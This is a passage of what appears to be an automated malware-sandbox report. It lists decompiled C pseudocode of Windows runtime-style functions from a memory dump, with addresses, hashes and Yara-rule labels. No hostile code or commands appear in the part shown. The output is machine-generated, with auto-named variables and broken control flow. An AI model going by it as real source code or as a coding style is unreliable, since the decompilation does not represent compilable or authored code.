				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x347ff00);
				E033FD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3381664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E033EE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3381668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E034251BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x338166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E033D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E033B6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E033D2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E033BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E033D2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E033D2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E033D2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E033FD0D1(_t62);
				goto L28;
			}





















                                          0x033d2990
                                          0x033d2992
                                          0x033d2997
                                          0x033d29a3
                                          0x033d29a6
                                          0x033d29ab
                                          0x033d29ad
                                          0x033d29b2
                                          0x03415c80
                                          0x033d29b8
                                          0x033d29b8
                                          0x033d29bb
                                          0x033d29c0
                                          0x033d29c5
                                          0x033d29c6
                                          0x033d29c6
                                          0x033d29cb
                                          0x00000000
                                          0x00000000
                                          0x033d29cd
                                          0x033d29d0
                                          0x033d29d9
                                          0x033d29db
                                          0x033d29dd
                                          0x033d2a7f
                                          0x033d2a84
                                          0x033d2a87
                                          0x033d2a89
                                          0x03415ca1
                                          0x03415ca3
                                          0x00000000
                                          0x033d2a8f
                                          0x033d2a8f
                                          0x00000000
                                          0x033d2a8f
                                          0x00000000
                                          0x033d29e3
                                          0x033d29e3
                                          0x033d29e3
                                          0x00000000
                                          0x033d29e3
                                          0x033d29dd
                                          0x00000000
                                          0x033d29db
                                          0x033d29e6
                                          0x033d29e9
                                          0x033d29eb
                                          0x033d29ed
                                          0x033d29f3
                                          0x033d29f5
                                          0x033d29f8
                                          0x033d29fa
                                          0x033d2a97
                                          0x033d2a9a
                                          0x033d2a9d
                                          0x033d2add
                                          0x00000000
                                          0x033d2a9f
                                          0x033d2aa2
                                          0x033d2aa5
                                          0x033d2aa8
                                          0x033d2aab
                                          0x03415cab
                                          0x03415caf
                                          0x03415cc5
                                          0x03415cda
                                          0x03415cdc
                                          0x03415cdf
                                          0x03415ce5
                                          0x00000000
                                          0x03415ceb
                                          0x03415ced
                                          0x03415cee
                                          0x00000000
                                          0x03415cee
                                          0x03415cb1
                                          0x03415cb4
                                          0x03415cb9
                                          0x03415cbb
                                          0x00000000
                                          0x03415cbd
                                          0x03415cbd
                                          0x00000000
                                          0x03415cbd
                                          0x03415cbb
                                          0x033d2ab1
                                          0x033d2ab1
                                          0x033d2ac4
                                          0x033d2ac6
                                          0x033d2ac6
                                          0x00000000
                                          0x033d2ac6
                                          0x033d2aab
                                          0x00000000
                                          0x033d2a00
                                          0x033d2a09
                                          0x033d2a0e
                                          0x033d2a21
                                          0x033d2a24
                                          0x033d2a35
                                          0x033d2a3a
                                          0x033d2a3d
                                          0x033d2a42
                                          0x033d2a59
                                          0x033d2a59
                                          0x033d2a5c
                                          0x033d2a5f
                                          0x033d2a5f
                                          0x033d29fa
                                          0x033d29f3
                                          0x033d2a64
                                          0x033d2a64
                                          0x033d2a6b
                                          0x033d2a6b
                                          0x033d2a6d
                                          0x033d2a72
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f1b6dadb889855b635cd02fc7ccdc2f5085b6b4a935056c655dc230e52af94c6
                                          • Instruction ID: 19c8597b879f8d29c42935edb97fafb6d8631ebd176d615b518ce78042fdc4d1
                                          • Opcode Fuzzy Hash: f1b6dadb889855b635cd02fc7ccdc2f5085b6b4a935056c655dc230e52af94c6
                                          • Instruction Fuzzy Hash: 1E515676E0021ADFCF25CF55D880ADFBBB9FF48310F088455E815AB260DB359962CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D4BAD, Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E033D4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x349d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E033ACC50(_t86);
					L11:
					return E033EB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x3498504
				E033C2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E033EFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E033EB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L033C4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E033ACCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x3498504
								E033BFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E033D4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                          0x033d4bad
                                          0x033d4bbf
                                          0x033d4bc2
                                          0x033d4bc6
                                          0x033d4bcd
                                          0x033d4bd9
                                          0x034167fe
                                          0x03416800
                                          0x033d4ccc
                                          0x033d4ccd
                                          0x033d4cb7
                                          0x033d4cc9
                                          0x033d4cc9
                                          0x033d4bdf
                                          0x033d4be5
                                          0x00000000
                                          0x00000000
                                          0x033d4beb
                                          0x033d4bef
                                          0x00000000
                                          0x00000000
                                          0x033d4bf5
                                          0x033d4bf9
                                          0x033d4c06
                                          0x033d4c0b
                                          0x033d4c17
                                          0x033d4c1c
                                          0x033d4c1f
                                          0x033d4c25
                                          0x033d4c33
                                          0x033d4c3d
                                          0x033d4c40
                                          0x033d4c43
                                          0x033d4c47
                                          0x033d4c4d
                                          0x033d4c53
                                          0x033d4c54
                                          0x033d4c55
                                          0x033d4c56
                                          0x033d4c5b
                                          0x033d4c5c
                                          0x033d4c63
                                          0x033d4c6b
                                          0x00000000
                                          0x00000000
                                          0x03416776
                                          0x03416784
                                          0x03416784
                                          0x0341679f
                                          0x034167a7
                                          0x034167af
                                          0x034167ce
                                          0x00000000
                                          0x034167b1
                                          0x034167b7
                                          0x034167b8
                                          0x034167c1
                                          0x034167d3
                                          0x034167d9
                                          0x034167dd
                                          0x033d4c94
                                          0x033d4c94
                                          0x033d4c98
                                          0x033d4c9c
                                          0x033d4ca3
                                          0x034167f4
                                          0x034167f4
                                          0x033d4cb5
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x033d4cb5
                                          0x033d4c79
                                          0x033d4c7e
                                          0x033d4c89
                                          0x033d4c8b
                                          0x033d4c8f
                                          0x033d4c8f
                                          0x00000000
                                          0x033d4c89
                                          0x034167c3
                                          0x00000000
                                          0x034167c3
                                          0x034167af
                                          0x033d4c73
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f4ded1c4d91d6f7fb951e9b45e7f2fbab3d8a41d5b0755ebf3f21abb3c407efe
                                          • Instruction ID: 0a47ae228ba6ebaf7b8e56679143f788c8b094b9b41c14ce58a8ceca0be7ee55
                                          • Opcode Fuzzy Hash: f4ded1c4d91d6f7fb951e9b45e7f2fbab3d8a41d5b0755ebf3f21abb3c407efe
                                          • Instruction Fuzzy Hash: F6419836E40628ABCB21DF65D980BEAB7B8EF45700F0504A6E908AF340DB74DD44CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033D4D3B, Relevance: .1, Instructions: 131COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E033D4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x349d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E033EFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x3497bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E033EB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L033C4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E033ACCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E033EB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E033EF380(_t67 + 0xc, 0x3385138, 0x10) == 0) {
								 *0x34960d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E033D4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E033D4E70(0x34986b0, 0x33d5690, 0, 0) != 0) {
					_t46 = E033ACCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                          0x033d4d3b
                                          0x033d4d4d
                                          0x033d4d53
                                          0x033d4d58
                                          0x033d4d65
                                          0x033d4d6c
                                          0x033d4d71
                                          0x033d4d77
                                          0x033d4d7f
                                          0x033d4d8c
                                          0x033d4d8e
                                          0x033d4dad
                                          0x033d4db0
                                          0x033d4db7
                                          0x033d4db8
                                          0x033d4db9
                                          0x033d4dba
                                          0x033d4dbb
                                          0x033d4dc1
                                          0x033d4dc8
                                          0x033d4dcc
                                          0x033d4dd5
                                          0x033d4dde
                                          0x033d4ddf
                                          0x033d4de0
                                          0x033d4de1
                                          0x033d4de6
                                          0x033d4de7
                                          0x033d4de9
                                          0x033d4df3
                                          0x00000000
                                          0x00000000
                                          0x03416c7c
                                          0x03416c8a
                                          0x03416c8a
                                          0x03416c9d
                                          0x03416ca7
                                          0x03416cac
                                          0x03416cb2
                                          0x03416cb9
                                          0x00000000
                                          0x03416cbf
                                          0x03416cbf
                                          0x00000000
                                          0x03416cbf
                                          0x03416cb9
                                          0x033d4dfb
                                          0x03416ccf
                                          0x03416cd3
                                          0x033d4e32
                                          0x033d4e39
                                          0x03416ce0
                                          0x03416cf2
                                          0x03416cf2
                                          0x03416ce0
                                          0x033d4e3f
                                          0x033d4e41
                                          0x033d4e51
                                          0x033d4e51
                                          0x033d4e03
                                          0x033d4e03
                                          0x033d4e09
                                          0x033d4e0f
                                          0x033d4e57
                                          0x00000000
                                          0x00000000
                                          0x033d4e1b
                                          0x033d4e30
                                          0x033d4e5b
                                          0x033d4e5b
                                          0x00000000
                                          0x033d4e30
                                          0x033d4e11
                                          0x033d4e11
                                          0x033d4e16
                                          0x00000000
                                          0x033d4e16
                                          0x033d4e01
                                          0x00000000
                                          0x033d4e01
                                          0x033d4da5
                                          0x03416c6b
                                          0x00000000
                                          0x033d4dab
                                          0x033d4dab
                                          0x00000000
                                          0x033d4dab

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3da8451055d981294fd277036a90e3067061cc74dca40e2cd818fd1d5c929f42
                                          • Instruction ID: 2fbd0576a4e5bb8a70e2382e8e06e499b8d95231e7bd43eb3060b985ffe91a9c
                                          • Opcode Fuzzy Hash: 3da8451055d981294fd277036a90e3067061cc74dca40e2cd818fd1d5c929f42
                                          • Instruction Fuzzy Hash: C341F276A40318AFEB31DF25DCC0FAAB7A9EB45610F05009AE8459F291EB74DD44CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03472B28, Relevance: .1, Instructions: 129COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E03472B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				signed int _t30;
				signed int _t35;
				unsigned int _t50;
				signed int _t52;
				signed int _t53;
				unsigned int _t58;
				signed int _t61;
				signed int _t63;
				signed int _t67;
				signed int _t69;
				intOrPtr _t75;
				signed int _t81;
				signed int _t87;
				void* _t88;
				signed int _t90;
				signed int _t93;

				_t69 = __ecx;
				_t30 = _a4;
				_t90 = __edx;
				_t81 = __ecx;
				_v12 = __ecx;
				_t87 = _t30 - 8;
				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
					_t87 = _t87 - 8;
				}
				_t67 = 0;
				if(_t90 != 0) {
					L14:
					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
						_t75 = (( *_t87 ^  *0x3496110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
						 *_a12 = _t75;
						_t35 = _a8 & 0x00000001;
						_v16 = _t35;
						if(_t35 == 0) {
							E033C2280(_t35, _t81);
							_t81 = _v12;
						}
						_v5 = 0xff;
						if(( *_t87 ^  *0x3496110 ^ _t87) < 0) {
							_t91 = _v12;
							_t88 = E0347241A(_v12, _t90, _t87, _a8,  &_v5);
							if(_v16 == _t67) {
								E033BFFB0(_t67, _t88, _t91);
							}
							if(_t88 != 0) {
								E03473209(_t91, _t88, _a8);
							}
							_t67 = 1;
						} else {
							_push(_t75);
							_push(_t67);
							E0346A80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
							if(_v16 == _t67) {
								E033BFFB0(_t67, _t87, _v12);
							}
						}
					} else {
						_push(_t69);
						_push(_t67);
						E0346A80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
					}
					return _t67;
				}
				_t69 =  *0x3496110; // 0xa1843604
				_t93 = _t87;
				_t50 = _t69 ^ _t87 ^  *_t87;
				if(_t50 >= 0) {
					_t52 = _t50 >> 0x00000010 & 0x00007fff;
					if(_t52 == 0) {
						L12:
						_t53 = _t67;
						L13:
						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
						goto L14;
					}
					_t93 = _t87 - (_t52 << 3);
					_t58 =  *_t93 ^ _t69 ^ _t93;
					if(_t58 < 0) {
						L10:
						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
						L11:
						_t53 = _t61 & 0x000000ff;
						goto L13;
					}
					_t63 = _t58 >> 0x00000010 & 0x00007fff;
					if(_t63 == 0) {
						goto L12;
					}
					_t93 = _t93 + _t63 * 0xfffffff8;
					goto L10;
				}
				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
				goto L11;
			}
























                                          0x03472b28
                                          0x03472b30
                                          0x03472b35
                                          0x03472b37
                                          0x03472b3a
                                          0x03472b3d
                                          0x03472b44
                                          0x03472b4d
                                          0x03472b4d
                                          0x03472b50
                                          0x03472b54
                                          0x03472bb0
                                          0x03472bbd
                                          0x03472be8
                                          0x03472bef
                                          0x03472bf4
                                          0x03472bf7
                                          0x03472bfa
                                          0x03472bfd
                                          0x03472c02
                                          0x03472c02
                                          0x03472c0f
                                          0x03472c13
                                          0x03472c3b
                                          0x03472c4a
                                          0x03472c4f
                                          0x03472c52
                                          0x03472c52
                                          0x03472c59
                                          0x03472c62
                                          0x03472c62
                                          0x03472c69
                                          0x03472c15
                                          0x03472c18
                                          0x03472c19
                                          0x03472c21
                                          0x03472c29
                                          0x03472c2f
                                          0x03472c2f
                                          0x03472c29
                                          0x03472bbf
                                          0x03472bc2
                                          0x03472bc3
                                          0x03472bc9
                                          0x03472bc9
                                          0x03472c72
                                          0x03472c72
                                          0x03472b56
                                          0x03472b5c
                                          0x03472b62
                                          0x03472b64
                                          0x03472b72
                                          0x03472b77
                                          0x03472ba3
                                          0x03472ba3
                                          0x03472ba5
                                          0x03472baa
                                          0x00000000
                                          0x03472baa
                                          0x03472b7e
                                          0x03472b84
                                          0x03472b86
                                          0x03472b97
                                          0x03472b9c
                                          0x03472b9e
                                          0x03472b9e
                                          0x00000000
                                          0x03472b9e
                                          0x03472b8b
                                          0x03472b90
                                          0x00000000
                                          0x00000000
                                          0x03472b95
                                          0x00000000
                                          0x03472b95
                                          0x03472b6b
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 749e1c7a40e3cc1500ea6e3b3766a17e7f748e933344beecca3599bdf7ef069b
                                          • Instruction ID: c989fda10bc3f464b08159bd69d8c2d0fd2b8f1a19b44d6ddebdc84df8197172
                                          • Opcode Fuzzy Hash: 749e1c7a40e3cc1500ea6e3b3766a17e7f748e933344beecca3599bdf7ef069b
                                          • Instruction Fuzzy Hash: 16413C77A101156FC714DF28C8849EBB7A9EF48220B054A6EE855DF340D6B4DD06C794
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B8A0A, Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E033B8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x349d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E033EB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E033BE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x3381180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E033D1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E033E3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E033B8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                          0x033b8a0a
                                          0x033b8a1c
                                          0x033b8a23
                                          0x033b8a2e
                                          0x033b8a30
                                          0x033b8a36
                                          0x033b8a3c
                                          0x033b8a3e
                                          0x033b8a4a
                                          0x033b8a52
                                          0x033b8a9c
                                          0x033b8aae
                                          0x033b8a58
                                          0x033b8a5e
                                          0x033b8a6a
                                          0x033b8a6f
                                          0x033b8a75
                                          0x033b8a7d
                                          0x033b8a85
                                          0x033b8a86
                                          0x033b8a89
                                          0x033b8a93
                                          0x033b8a99
                                          0x033b8a9b
                                          0x00000000
                                          0x033b8aaf
                                          0x033b8abe
                                          0x033b8ac3
                                          0x033b8acb
                                          0x033b8ad7
                                          0x033b8ae0
                                          0x033b8af1
                                          0x00000000
                                          0x033b8af1
                                          0x033b8acd
                                          0x033b8ad5
                                          0x033b8afb
                                          0x033b8afd
                                          0x033b8aff
                                          0x033b8b07
                                          0x033b8b22
                                          0x033b8b24
                                          0x033b8b2a
                                          0x033b8b2e
                                          0x033b8b3f
                                          0x033b8b78
                                          0x033b8b41
                                          0x033b8b52
                                          0x033b8b54
                                          0x033b8b5c
                                          0x033b8b74
                                          0x033b8b74
                                          0x033b8b5c
                                          0x033b8b3f
                                          0x033b8b5e
                                          0x033b8b61
                                          0x033b8b64
                                          0x033b8b64
                                          0x033b8b6c
                                          0x033b8b6c
                                          0x033b8b11
                                          0x03409cd5
                                          0x03409cd5
                                          0x033b8b17
                                          0x033b8b1a
                                          0x033b8b1a
                                          0x00000000
                                          0x033b8ad5
                                          0x033b8a89

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf8dcfbe48e4953afb3b3a22eacd932e8af19d1eae68be5b299e3ab0b905c29b
                                          • Instruction ID: e8b977ab014cfe58fd78c05028c1261473ca4704766dd6f882d57261713ed7c6
                                          • Opcode Fuzzy Hash: bf8dcfbe48e4953afb3b3a22eacd932e8af19d1eae68be5b299e3ab0b905c29b
                                          • Instruction Fuzzy Hash: 03414FB5A003689BDB24DF25CCC8AE9B7BCFB44300F1445EAD9199B651E7709E80CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 034722AE, Relevance: .1, Instructions: 116COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E034722AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
